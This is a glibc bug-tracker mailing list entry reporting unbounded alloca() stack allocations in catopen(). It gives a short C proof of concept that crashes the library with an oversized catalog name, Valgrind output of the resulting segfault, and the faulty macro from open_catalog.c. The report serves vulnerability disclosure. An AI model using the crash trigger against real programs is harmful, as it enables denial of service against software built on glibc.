This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug libc/17905] New: catopen() Multiple unbounded stack allocations
- From: "max at cxib dot net" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sourceware dot org
- Date: Thu, 29 Jan 2015 22:10:05 +0000
- Subject: [Bug libc/17905] New: catopen() Multiple unbounded stack allocations
- Auto-submitted: auto-generated
https://sourceware.org/bugzilla/show_bug.cgi?id=17905
Bug ID: 17905
Summary: catopen() Multiple unbounded stack allocations
Product: glibc
Version: 2.20
Status: NEW
Severity: normal
Priority: P2
Component: libc
Assignee: unassigned at sourceware dot org
Reporter: max at cxib dot net
CC: drepper.fsp at gmail dot com
Reference:
https://sourceware.org/bugzilla/show_bug.cgi?id=17897
PoC:
#include <nl_types.h>
#include <string.h>
#include <stdlib.h>
int main(){
char *buff;
buff=malloc(11111111);
memset(buff,'A',11111110);
buff[11111110]='\0';
catopen(buff, NL_CAT_LOCALE);
return 0;
}
========================
==25788== Memcheck, a memory error detector
==25788== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==25788== Using Valgrind-3.10.0.SVN and LibVEX; rerun with -h for copyright
info
==25788== Command: ./cato
==25788==
==25788== Warning: client switching stacks? SP change: 0xfff000330 -->
0xffe567648
==25788== to suppress, use: --max-stackframe=11111656 or greater
==25788== Invalid write of size 8
==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788== by 0x4E6C38E: catopen (catgets.c:71)
==25788== by 0x400616: main (in /home/kalibaba/cato)
==25788== Address 0xffe567648 is on thread 1's stack
==25788==
==25788==
==25788== Process terminating with default action of signal 11 (SIGSEGV)
==25788== Access not within mapped region at address 0xFFE567648
==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788== If you believe this happened as a result of a stack
==25788== overflow in your program's main thread (unlikely but
==25788== possible), you can try to increase the size of the
==25788== main thread stack using the --main-stacksize= flag.
==25788== The main thread stack size used in this run was 8388608.
========================
open_catalog.c
#define ENOUGH(n) \
if (__builtin_expect (bufact + (n) >= bufmax, 0)) \
{ \
char *old_buf = buf; \
bufmax += 256 + (n); \
buf = (char *) alloca (bufmax); \
<===============
memcpy (buf, old_buf, bufact); \
}
and others alloca() in catopen()
--
You are receiving this mail because:
You are on the CC list for the bug.